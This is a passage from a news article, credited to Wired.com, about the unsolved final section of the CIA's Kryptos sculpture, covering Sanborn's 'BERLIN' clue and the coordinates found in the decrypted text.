unsolved for so long, and perhaps feeling guilty about an error he had made in the sculpture that misled puzzle-solvers for years, decided to disclose six of the 97 letters in the last section. The six letters — NYPVTT — are the 64th through 69th letters of the final section and when deciphered spell out the word “BERLIN.” The clue has yet to be the breakthrough that code crackers had hoped it would be, however, and the last section still remains unsolved. Even when that final section is solved, however, sleuths still won’t know what the sculpture means. The deciphered text contains a riddle, which will require them to be on the CIA grounds in order to solve it. “In part of the code that’s been deciphered, I refer to an act that took place when I was at the agency and a location that’s on the ground of the agency,” Sanborn told Wired in 2005. He may be referring to something he buried on the CIA grounds, though he won’t say for sure. The decrypted text gives latitude and longitude coordinates (38 57 6.5 N, 77 8 44 W), which Sanborn has said refer to “locations of the agency.” So sleuths will have to first decipher the code then find their way onto the CIA grounds and locate that place in order to finally discover what it all means. Sursa Wired.Com